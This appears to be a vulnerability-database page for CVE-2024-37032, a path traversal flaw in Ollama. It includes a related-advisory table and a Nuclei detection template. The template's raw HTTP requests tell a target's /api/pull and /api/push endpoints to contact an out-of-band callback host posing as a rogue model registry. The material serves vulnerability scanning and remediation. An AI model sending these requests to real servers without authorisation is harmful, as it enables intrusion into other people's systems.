| Reporter | Title | Published | Views | Family All 46 |
|---|---|---|---|---|
| Exploit for Path Traversal in Ollama | 26 Jun 202403:11 | – | githubexploit | |
| CVE-2024-37032 | 31 May 202404:15 | – | attackerkb | |
| The vulnerability of Ollama’s system for running and managing large language models lies in errors in processing the relative path to the catalog. This allows a malicious actor to gain access to arbitrary files within the vulnerable system. | 10 Jul 202400:00 | – | bdu_fstec | |
| CVE-2024-37032 vulnerabilities | 31 May 202404:15 | – | cgr | |
| CVE-2024-37032 | 24 Jun 202415:59 | – | circl | |
| Ollama Security Breach | 31 May 202400:00 | – | cnnvd | |
| CVE-2024-37032 | 31 May 202400:00 | – | cve | |
| CVE-2024-37032 | 31 May 202400:00 | – | cvelist | |
| Ollama does not validate the format of the digest (sha256 with 64 hex digits) | 31 May 202406:30 | – | github | |
| Ollama Model Registry Path Traversal RCE | 25 Feb 202619:00 | – | metasploit |
id: CVE-2024-37032
info:
name: Ollama - Remote Code Execution
author: kaks3c
severity: critical
description: |
Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.
impact: |
Attackers can exploit improper digest validation to achieve remote code execution on Ollama servers.
remediation: |
Update Ollama to version 0.1.34 or later.
reference:
- https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
- https://nvd.nist.gov/vuln/detail/CVE-2024-37032
- https://github.com/Bi0x/CVE-2024-37032
classification:
epss-score: 0.89633
epss-percentile: 0.99772
cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ollama
product: ollama
shodan-query: ollama
tags: cve,cve2024,ollama,rce,ai,vkev,vuln
http:
- raw:
- |
POST /api/pull HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
- |
POST /api/push HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true}
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest')
condition: and
# digest: 4b0a00483046022100f704e14423d7cba6ede1c74c6f95457633311f01950e77286423c501c93186bd022100e3ec2ccb970f05f7a8408f2d7428915eb1481c9d3c000397756937e90bbfcf98:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation